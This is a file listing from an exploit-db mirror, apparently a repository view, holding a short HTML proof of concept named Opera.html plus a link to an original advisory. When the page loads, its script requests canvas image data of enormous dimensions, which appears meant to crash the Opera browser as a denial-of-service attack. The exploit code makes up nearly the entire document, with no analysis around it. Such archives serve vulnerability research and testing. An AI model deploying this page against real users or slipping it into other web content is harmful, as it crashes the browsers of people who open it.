exploit-db-mirror/platforms/windows/dos/14349.html
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

35 lines
No EOL
406 B
HTML
Executable file

Opera.html
<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0x20000,0x20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>
Original Advisory:
http://pouya.info/blog/userfiles/vul/OperaCC.pdf